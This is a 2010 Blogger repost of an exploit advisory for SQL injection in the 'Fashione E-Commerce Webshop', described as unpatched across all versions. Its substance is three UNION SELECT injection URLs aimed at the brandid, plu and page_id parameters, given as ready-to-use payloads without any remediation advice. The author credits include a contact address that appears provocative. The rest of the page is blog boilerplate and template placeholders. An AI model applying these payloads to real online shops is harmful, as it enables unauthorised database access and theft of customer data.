midads

You are Here: > Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability

Minggu, 19 September 2010

Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability


______  _____________  / /_

  / ___/ _ \/ ___/ ___/ _ \/ __/
 (__  )  __/ /__/ /  /  __/ /_ 
/____/\___/\___/_/   \___/\__/ #####################################################################
 
# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities
# Date: 2010-09-19
# Author: secret
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.fashione.co.uk/
# Version: All versions so far
# Tested on: XP
 
# Fixed? : NOT FIXED
 
----------------------------------------------------------------------------
 
[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="
 
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4
 
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4
 
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4
 
################################################################################################
 
[THANKS TO]
  
ALLAH - الله لا إله لا ايل
  
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION                 

Related Articles :


Stumble
Delicious
Technorati
Twitter
Facebook

 

Label:

0 komentar:

Posting Komentar

VIDEO

ENTER-TAB1-CONTENT-HERE

RECENT POSTS

ENTER-TAB2-CONTENT-HERE

POPULAR POSTS

ENTER-TAB3-CONTENT-HERE
 

Portal Bebas Copyright © 2010 Premium Wordpress Themes | Website Templates | Blogger Template is Designed by Lasantha.